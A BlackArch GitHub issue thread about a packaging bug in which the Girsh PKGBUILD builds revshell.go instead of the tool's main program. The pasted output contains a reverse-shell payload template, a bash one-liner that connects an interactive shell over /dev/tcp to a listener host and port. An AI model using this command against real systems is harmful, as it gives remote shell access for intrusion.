### ISSUE TITLE
Girsh: build target

### ISSUE THREAD

**Issue by noraj** [BlackArch/blackarch#3106]
### Bug description

Warning: I don't know how Go projects work.

It seems that [Girsh PKGBUILD](https://github.com/BlackArch/blackarch/blob/master/packages/girsh/PKGBUILD) is building only the [revshell.go](https://github.com/nodauf/Girsh/blob/main/revshell.go) instead of the full tool located in the |src/](https://github.com/nodauf/Girsh/tree/main/src) folder.

So when you launch the tool it does not execute the expected function:

```
$ girsh -h | head 
[
 {
  "type": "php",
  "note": "",
  "payload": "test"
 },
 {
  "type": "bash",
  "note": "",
  "payload": "/bin/bash -c '/bin/bash -i \u003e\u0026 /dev/tcp/{LHOST}/{LPORT} 0\u003e\u00261' "
```

It should execute `src/main.go` instead. I don't know how to have the same behavior than `go run src/main.go -h`. I guess the `go.mod` is not properly setup?

## Update

I'm reading https://blog.golang.org/using-go-modules and I understand it's normal that `revshell.go` is there and that the one that should the main in src/.

> Create a new, empty directory somewhere outside $GOPATH/src, cd into that directory, and then create a new source file, hello.go:

**Comment by noraj** [comment]
Thanks @Edu4rdSHL. I tried to troubleshot locally without a chance. Trying to find a better alternative I found [Platypus](https://github.com/BlackArch/blackarch/issues/3107) the [interactive shell mode](https://github.com/WangYihang/Platypus#interactive-shell-mode) worked well and the multi-listener is nice too.

**Comment by Edu4rdSHL** [comment]
Hey @noraj, it was an easy fix. I'm working on the Platypus PKGBUILD too.
